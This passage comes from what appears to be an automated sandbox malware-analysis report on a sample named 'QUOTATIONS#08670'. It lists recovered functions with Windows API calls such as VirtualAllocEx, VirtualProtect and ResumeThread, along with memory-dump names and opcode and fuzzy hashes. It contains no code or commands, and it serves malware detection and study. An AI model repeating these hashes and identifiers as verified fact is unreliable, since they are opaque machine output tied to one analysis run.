                                                          • Opcode Fuzzy Hash: b3e168c12a0b0e988f7e4abf8014c4d88b70ac7bc1ed29d0dc501d428a3d6ff4
                                                          • Instruction Fuzzy Hash: E02147B1C003099FCB10DFAAC885AEEFBF4EF48320F10842AD519A7250C7799945DFA1
                                                          Function 079226B1 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualProtect.KERNEL32(?,?,?,?), ref: 0792272B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2025146738.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7920000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 50594d694eb63bd0074b83d87a088c689b0a88ad8042119c3392e54b34e31bcb
                                                          • Instruction ID: 06256093f274072700fa3d10f722e69594b3b9bf67df8b21b74c87e28011b628
                                                          • Opcode Fuzzy Hash: 50594d694eb63bd0074b83d87a088c689b0a88ad8042119c3392e54b34e31bcb
                                                          • Instruction Fuzzy Hash: 672133B59002499FCB10DF9AD484ADEFBF4FB48320F10842AE869A7251D339A945CFA1
                                                          Function 0712ACCF Relevance: 1.6, APIs: 1, Instructions: 57fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DeleteFileW.KERNEL32(00000000), ref: 0712AD40
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2024406151.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7120000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: DeleteFile
                                                          • String ID:
                                                          • API String ID: 4033686569-0
                                                          • Opcode ID: ed104cf79a694208d3d194b951a295a3161440bf1a366d7f4d568d0cb7227c19
                                                          • Instruction ID: 45f4f7494e810793c2ac95c9b6ea27a05b8991f2b6222a4760e49ff243c076b9
                                                          • Opcode Fuzzy Hash: ed104cf79a694208d3d194b951a295a3161440bf1a366d7f4d568d0cb7227c19
                                                          • Instruction Fuzzy Hash: 102144B1C0062A9BCB10CF9AD4447DEFBB4AF08320F10812AD818B7240D338A944CFA5
                                                          Function 0712ACD0 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DeleteFileW.KERNEL32(00000000), ref: 0712AD40
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2024406151.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7120000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: DeleteFile
                                                          • String ID:
                                                          • API String ID: 4033686569-0
                                                          • Opcode ID: 1c4f3eccb2d8cd946645d3ae9753bdfab9e8a9a2ae3c84f8d55e9066be5cc7ad
                                                          • Instruction ID: 19eec8ba5643f1c1f420805e632ed8a84b98eb155729d98bfd101f35f2a6f0c0
                                                          • Opcode Fuzzy Hash: 1c4f3eccb2d8cd946645d3ae9753bdfab9e8a9a2ae3c84f8d55e9066be5cc7ad
                                                          • Instruction Fuzzy Hash: 981122B1C0066A9BCB14CF9AD544B9EFBB4AF48320F15812AD858B7240D338A945CFA5
                                                          Function 079226B8 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualProtect.KERNEL32(?,?,?,?), ref: 0792272B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2025146738.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7920000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 59f4512e691f3951ba82107520b02dea916e5b85cba2231b298e44004fca6cb0
                                                          • Instruction ID: 9920ee10061321970d23bb8c54c9b917490e90a8608cdaa3711f558875c9b689
                                                          • Opcode Fuzzy Hash: 59f4512e691f3951ba82107520b02dea916e5b85cba2231b298e44004fca6cb0
                                                          • Instruction Fuzzy Hash: 952114B59002499FCB10DF9AC484BDEFBF8FB48320F10842AE958A3250D378A944CFA1
                                                          Function 0792BF78 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0792BFE6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2025146738.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7920000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: fe70b0bbcf64aaa67082b0ebff383f645bc4ea8cfd6da14868fc7f76988e6341
                                                          • Instruction ID: eef356b71553d2f3999ffeba6a64aac39c147ad3cc6f0a8492a6309d3f31dfa1
                                                          • Opcode Fuzzy Hash: fe70b0bbcf64aaa67082b0ebff383f645bc4ea8cfd6da14868fc7f76988e6341
                                                          • Instruction Fuzzy Hash: 691137B19002599FCB10EFAAC845ADEFFF5EF48324F108419E519A7250C775A945CFA1
                                                          Function 0792CF10 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2025146738.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7920000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: 5261aea5eed8f028e313b081195eda9ee2c42cb6d98caef0015356b63b7a5d40
                                                          • Instruction ID: a78bfa64a30d0848eefb798a44078ea47d2c4eefe42413c1f03b396548322e67
                                                          • Opcode Fuzzy Hash: 5261aea5eed8f028e313b081195eda9ee2c42cb6d98caef0015356b63b7a5d40
                                                          • Instruction Fuzzy Hash: 7C1125B1D002598BCB24DFAAC4457DEFBF8AB89324F20841AD419A7250C779A945CBA5
                                                          Function 07927900 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 0792D72D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2025146738.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7920000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: MessagePost
                                                          • String ID:
                                                          • API String ID: 410705778-0
                                                          • Opcode ID: cd3a380f2aa367ca7ee6e8dffc62c6370d727d46bc5709c965da03747ef3f46e
                                                          • Instruction ID: 8763ff7aaef36f4ef06a6bf5cdc50f3b10c2a5b62757841f406e9b95a52ee7e4
                                                          • Opcode Fuzzy Hash: cd3a380f2aa367ca7ee6e8dffc62c6370d727d46bc5709c965da03747ef3f46e
                                                          • Instruction Fuzzy Hash: 521122B59007599FCB10EF9AD488BDEFBF8EB48310F208419E558A7200D378A944CFA5
                                                          Function 008F9281 Relevance: 1.4, Strings: 1, Instructions: 117COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'_q
                                                          • API String ID: 0-2033115326
                                                          • Opcode ID: c3347b25a28158541125caccdb35179c513fd0597efc677e9ee6f6d5ccf60b4b
                                                          • Instruction ID: 7e61fe52dd595521279175ae5f941d3dfbcebc5440cf97818a109d7d0a62283f
                                                          • Opcode Fuzzy Hash: c3347b25a28158541125caccdb35179c513fd0597efc677e9ee6f6d5ccf60b4b
                                                          • Instruction Fuzzy Hash: B24135746002099FCB158F69D998BBE7BB5FB88314F1000A9E696CB3B2CB30DD41CB91
                                                          Function 008F95C8 Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'_q
                                                          • API String ID: 0-2033115326
                                                          • Opcode ID: 63b210fc947a305203ae7ed292ce1bb12b9847dd43bdf75ae1e1b327242c0b93
                                                          • Instruction ID: 0999e8cdd5c43019d7f72581836c4f0e4c4e013fb4daffe5aaf7f2d7238679da
                                                          • Opcode Fuzzy Hash: 63b210fc947a305203ae7ed292ce1bb12b9847dd43bdf75ae1e1b327242c0b93
                                                          • Instruction Fuzzy Hash: C821A17170425D9BCB14CF36D890BBB7BEAFBA6714B154426EA96C7258DB3ACC00C760
                                                          Function 008F50F0 Relevance: 1.3, Strings: 1, Instructions: 48COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (cq
                                                          • API String ID: 0-301743287
                                                          • Opcode ID: 6ee5745d1322dd061b065ec7f05a855e04c6c3b7f171277a790d032382da83fd
                                                          • Instruction ID: 14f0c460b10c63b7ea6fb828f087c9612b0c328ed43d57650ecdaa661504a2e5
                                                          • Opcode Fuzzy Hash: 6ee5745d1322dd061b065ec7f05a855e04c6c3b7f171277a790d032382da83fd
                                                          • Instruction Fuzzy Hash: 2601DE316097449FC7259F69AC1001EBFB6EF8232132446AFD549C7292CE20AE08C3A2
                                                          Function 0792FD18 Relevance: 1.3, APIs: 1, Instructions: 47COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2025146738.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7920000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: CloseHandle
                                                          • String ID:
                                                          • API String ID: 2962429428-0
                                                          • Opcode ID: d53d2647494b3ec544fbf04abe97365148e941311f66daa955371ba77f4d8f29
                                                          • Instruction ID: 53f080790c40596137816efa4a7ec7e64dea1c71141ffff38a07f119943c992d
                                                          • Opcode Fuzzy Hash: d53d2647494b3ec544fbf04abe97365148e941311f66daa955371ba77f4d8f29
                                                          • Instruction Fuzzy Hash: 2B1133B58003499FCB20DF9AC445BDEBBF4EB48320F10841AD559A7240D338A945CFA5
                                                          Function 071ED924 Relevance: .6, Instructions: 616COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2024910722.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_71e0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e1d4958dec4e2b40ac7465bb0c5819133a613c3040e6efd7a90ccc9e1d21830f
                                                          • Instruction ID: 56afc02870dcc0f6b62dc4df77024ed45d061b775950e047b29dc1aacddf230c
                                                          • Opcode Fuzzy Hash: e1d4958dec4e2b40ac7465bb0c5819133a613c3040e6efd7a90ccc9e1d21830f
                                                          • Instruction Fuzzy Hash: 3AC1C070B142118FD304FFB8D49922D7BF6AF88614F81896DE4C9D73A4DE38984AC762
                                                          Function 071EB5CC Relevance: .6, Instructions: 552COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2024910722.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_71e0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5b1975c04e89bfb8c0830f2553fb069ac79735e067c71b82a0a9ade2249839f8
                                                          • Instruction ID: d7e0906e8947d6017a0d1888faf3ecc5cb6b3adb8586f703c62dd1e9ca7d82d3
                                                          • Opcode Fuzzy Hash: 5b1975c04e89bfb8c0830f2553fb069ac79735e067c71b82a0a9ade2249839f8
                                                          • Instruction Fuzzy Hash: AD228F75E14214CFCB04FFB8E85826DBBB2AB49300F4185AAD489E73A4DF345D85CBA1
                                                          Function 071EA721 Relevance: .4, Instructions: 432COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2024910722.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_71e0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4ca1a4fbceb416028e9e3fd2693bbdbebb5473891c457e02d2d097786b559c5a
                                                          • Instruction ID: 14e467823cacb8456050ddc3f24074ef3d61a1cb5a1afd979379edf3921bfad0
                                                          • Opcode Fuzzy Hash: 4ca1a4fbceb416028e9e3fd2693bbdbebb5473891c457e02d2d097786b559c5a
                                                          • Instruction Fuzzy Hash: 30E1F470B183108FC305BB78D85922D7BF6BF85214F81C96AD4C9D73A5DA389C46C762
                                                          Function 071E9A68 Relevance: .4, Instructions: 413COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2024910722.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_71e0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9f687a65ec797728682b02c101c6283c1e70c0a280ab6bfe7ad0024a281e0316
                                                          • Instruction ID: 9a8186397808be814fa8deb273f85a6daec446079acc41f9192f30e1eff1520b
                                                          • Opcode Fuzzy Hash: 9f687a65ec797728682b02c101c6283c1e70c0a280ab6bfe7ad0024a281e0316
                                                          • Instruction Fuzzy Hash: 6FE1B571B14221CBC704FFB8E49963D7BB6BF88244F818969D489E7394DE389C46C792
                                                          Function 008FD868 Relevance: .4, Instructions: 358COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9bcaf397712abab095515adbff9e27c4e53b5698a7ff09c341b19ceef88112fb
                                                          • Instruction ID: e7036a13b1c8cf82f4cb6417a864c08d82659e8551a6bf8c23e001b28b538db6
                                                          • Opcode Fuzzy Hash: 9bcaf397712abab095515adbff9e27c4e53b5698a7ff09c341b19ceef88112fb
                                                          • Instruction Fuzzy Hash: F3C17271A14225DBD704BFB8EC98A3E77BAFB88604F418929D488D3354DF34581AC7A7
                                                          Function 008FDF28 Relevance: .3, Instructions: 330COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9b8ab61ff2df18f04337c997e89f593f454e52ae18bdffed64ab148f932db5bb
                                                          • Instruction ID: b54f0e54ac0ed2c5d16b89aaf53d2339d9693664f6f8ee5611cfb2030ea64605
                                                          • Opcode Fuzzy Hash: 9b8ab61ff2df18f04337c997e89f593f454e52ae18bdffed64ab148f932db5bb
                                                          • Instruction Fuzzy Hash: 18B19570A10126DBD704FBB8D99862E77BAFB88604F518929D48DE3354DE385C06C7B7
                                                          Function 008F70A0 Relevance: .2, Instructions: 202COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1f9f75ee98282a7bea2454ed9fc1ed91fc42652ad8d1e49293e582cbb883e5f6
                                                          • Instruction ID: a78358c185fb2745de2a2e24dbc110f143938c9c72754a59807b9d14c98f1de8
                                                          • Opcode Fuzzy Hash: 1f9f75ee98282a7bea2454ed9fc1ed91fc42652ad8d1e49293e582cbb883e5f6
                                                          • Instruction Fuzzy Hash: B761D2303082099FEB149B78D854B3A7AA6FFD8314F24856AE606CB3A5DF74CC46C791
                                                          Function 008F9481 Relevance: .2, Instructions: 184COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 79109fa14c92d48ff2b30d73dc9c65534fb1d59be90e09096b5fe8a4631430df
                                                          • Instruction ID: 488d641c6fc27886ba7fa427502dd91064b73256b54f18a3868e24195304825d
                                                          • Opcode Fuzzy Hash: 79109fa14c92d48ff2b30d73dc9c65534fb1d59be90e09096b5fe8a4631430df
                                                          • Instruction Fuzzy Hash: 8451BE317041098FCB15CF39D894A7A7BE9FF9971431644AAEA4ACB371EB21DC01CB60
                                                          Function 008FD380 Relevance: .2, Instructions: 173COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b342c86ac4184e6566ad866dc2c52e6496f4871a2dc7628410287d4a35ecdc8d
                                                          • Instruction ID: 73f52f333c2caddbe7da851b09ae497ccfdeee78ef491caf445c8d5b779ddd89
                                                          • Opcode Fuzzy Hash: b342c86ac4184e6566ad866dc2c52e6496f4871a2dc7628410287d4a35ecdc8d
                                                          • Instruction Fuzzy Hash: 7AF082317442485FD308AB75AC6977A3FA5BF89651F1884F9F249CF2B6DE608C01C781
                                                          Function 008FD3C8 Relevance: .2, Instructions: 154COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 54f377ec6c16003a123133dbd5fc34592c989bfb68bb8b932334ed057e00d0af
                                                          • Instruction ID: 9797165049a1bc42a6250dc8a739b73b7e3b922aefc55489bf920445adf6edfe
                                                          • Opcode Fuzzy Hash: 54f377ec6c16003a123133dbd5fc34592c989bfb68bb8b932334ed057e00d0af
                                                          • Instruction Fuzzy Hash: 00D01272089389CFC30367B0BE2C0B43FA2FD5726632D40E7E245C7636E9614816C716
                                                          Function 008FD3D8 Relevance: .1, Instructions: 148COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5312ed0ddee46abc02f6467cd502236eead354b077657042fa7dc8db2d9c74b2
                                                          • Instruction ID: 5efdcab8d9f12a5e34d2dab30123c471b7736a16296d36f8ef09bcae48864563
                                                          • Opcode Fuzzy Hash: 5312ed0ddee46abc02f6467cd502236eead354b077657042fa7dc8db2d9c74b2
                                                          • Instruction Fuzzy Hash: 49B0923200430ECBC3003BA0FC0C0383BA8FE0438A3204031B30AC32309E601820CA5A
                                                          Function 008F5DF0 Relevance: .1, Instructions: 143COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e5e289dd3ecf95693f76e219c77bb9b87fe772a7bd70104c16ee134396005673
                                                          • Instruction ID: 5300d7d48dc7e358eee4c632ba5c5d77726b9e739a7d829e74b1d260fcbd4e3f
                                                          • Opcode Fuzzy Hash: e5e289dd3ecf95693f76e219c77bb9b87fe772a7bd70104c16ee134396005673
                                                          • Instruction Fuzzy Hash: 5D5198313086099FCB059F68D858A7A3BB2FF89310F1180A9FA06CB3A6CB75DD55CB51
                                                          Function 008F56F0 Relevance: .1, Instructions: 140COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ef5bcdce9da02aff5e629767c048acc3d74da7b278a8e4639973a5e4acfe0462
                                                          • Instruction ID: 428e2bba4b8e5d261188aaf05072c0bf01aa7b995425ac5cda0908feafff2e1f
                                                          • Opcode Fuzzy Hash: ef5bcdce9da02aff5e629767c048acc3d74da7b278a8e4639973a5e4acfe0462
                                                          • Instruction Fuzzy Hash: C0412832B083848FCB05DF79A89069ABFB1EF81324B1985EBD548DB287D630D905C7A1
                                                          Function 008FDD95 Relevance: .1, Instructions: 115COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 280efbe3929775e5b4aff8c75036f5b96bd5d99bf8bb5bdfa4576018d7a9f436
                                                          • Instruction ID: b810fd48f6122802e5f46c19ef38c3ce5cc6902bf6c539f29cc89731c4db5ef2
                                                          • Opcode Fuzzy Hash: 280efbe3929775e5b4aff8c75036f5b96bd5d99bf8bb5bdfa4576018d7a9f436
                                                          • Instruction Fuzzy Hash: D831257190C3958FC302ABB4D8A46697FB6FF52604F4985DBD2C9DB163CA384819C366
                                                          Function 008F96B0 Relevance: .1, Instructions: 89COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3269c5c14517229461ed7be3ba73c3b46261f2f0effa7bebe9af97aa4c075747
                                                          • Instruction ID: 1b9c97570740239291e46af61c96f0abf7a93a0a25d240217a8dfb3cbfed18cd
                                                          • Opcode Fuzzy Hash: 3269c5c14517229461ed7be3ba73c3b46261f2f0effa7bebe9af97aa4c075747
                                                          • Instruction Fuzzy Hash: E621DE393143094BDB152E39C85477A2697FFD4718F28807AD646CB7A8EE29CC42D381
                                                          Function 008F5C40 Relevance: .1, Instructions: 85COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e0bba332059d2a9d2f67e7962eab86b0026bffee1151f12dd4f7c4d8f43adf99
                                                          • Instruction ID: 0d5f19c6fe0197e418568ca30a9a0a007bab38ef628f78a8bc908f53ff21fb21
                                                          • Opcode Fuzzy Hash: e0bba332059d2a9d2f67e7962eab86b0026bffee1151f12dd4f7c4d8f43adf99
                                                          • Instruction Fuzzy Hash: 7B21C134B002089FD704EF7998557AE7FE6FBC8710F248469E609EB398DB309D068B90
                                                          Function 008F4968 Relevance: .1, Instructions: 80COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 924d414c697c15ea9c5c3cf1edc7dc1b875ba8cd01fbd721e2996c89afafb161
                                                          • Instruction ID: 66593a6dfadb5a9ae0681c1570ba5da83f4d398e2604637ba4e75a0e77b5571b
                                                          • Opcode Fuzzy Hash: 924d414c697c15ea9c5c3cf1edc7dc1b875ba8cd01fbd721e2996c89afafb161
                                                          • Instruction Fuzzy Hash: 15210675E483558FDF11AB7494282FE7BA2EF88211F14047ED846C7354EE744806CBC6
                                                          Function 008F72F0 Relevance: .1, Instructions: 78COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7a9cc6e9484e05807c280ad004783fdabd13fbad049cb98daf3aa0f3b57ba1aa
                                                          • Instruction ID: fbfed971eba99ab665f6f5a4f1802cb30c776e3725a9595756e81d7b08cf2368
                                                          • Opcode Fuzzy Hash: 7a9cc6e9484e05807c280ad004783fdabd13fbad049cb98daf3aa0f3b57ba1aa
                                                          • Instruction Fuzzy Hash: 512122353086199BD7259B38D864A3EB7A2FFC975035581ADDA06CB3A4DF30DC06C781
                                                          Function 071EA014 Relevance: .1, Instructions: 76COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2024910722.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_71e0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 63b292c51ca88b1b53e828dc7e4008c1ac182216871f5e528d1816a1eaca3314
                                                          • Instruction ID: 03e80de042ec770ecdcbf29c355212930953654c81a53faa4b72a5bf81ee0f01
                                                          • Opcode Fuzzy Hash: 63b292c51ca88b1b53e828dc7e4008c1ac182216871f5e528d1816a1eaca3314
                                                          • Instruction Fuzzy Hash: 542168A164E3D24FD7039BB49C682A97F75AF43110B0A42E7D495CB1F3C6285C0AC363
                                                          Function 008F5368 Relevance: .1, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
